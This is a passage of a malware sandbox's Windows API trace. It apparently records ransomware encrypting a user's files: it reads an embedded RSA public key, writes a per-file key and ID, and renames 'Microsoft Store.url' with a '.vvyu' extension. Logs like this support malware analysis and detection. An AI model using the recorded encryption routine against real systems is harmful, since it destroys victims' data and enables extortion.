0x568 [0197.447] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=134) returned 1 [0197.447] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0197.461] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.462] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.475] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.475] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x86, lpOverlapped=0x0) returned 1 [0197.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0197.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.487] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0197.489] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0197.489] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.489] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0197.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0197.489] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0197.512] GetLastError () returned 0x0 [0197.536] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0197.536] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0197.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.551] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0197.551] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0197.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.551] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0197.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0197.551] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0197.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0197.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0197.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95020 [0197.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0197.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94fd8 [0197.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0197.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0197.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0197.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0197.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0197.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0197.744] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0197.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0197.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0197.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0197.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0197.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0197.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fc0 [0197.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0197.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2fa8 [0197.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0197.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0197.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0197.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0197.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0197.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0197.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0197.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0197.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0197.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0197.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0197.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0197.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0197.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0197.920] GetCurrentThreadId () returned 0x66c [0197.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0197.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5a40 [0197.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0197.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0197.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0197.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0197.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0197.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0197.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.104] GetCurrentThreadId () returned 0x66c [0198.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0198.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0198.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0198.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fc0 [0198.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0198.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3020 [0198.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0198.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0198.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0198.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3038 [0198.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fd8 [0198.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0198.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0198.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fa8 [0198.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0198.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0198.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0198.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0198.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0198.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0198.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0198.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0198.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94fd8 | out: hHeap=0x620000) returned 1 [0198.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.225] WriteFile (in: hFile=0x568, lpBuffer=0x2e915e0*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e915e0*, lpNumberOfBytesWritten=0x312fb14*=0x81, lpOverlapped=0x0) returned 1 [0198.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.226] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.226] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0198.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0198.248] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.248] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.248] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.249] CloseHandle (hObject=0x568) returned 1 [0198.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0198.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0198.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.250] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft store.url.vvyu")) returned 1 [0198.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.253] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0198.255] FindNextFileW (in: 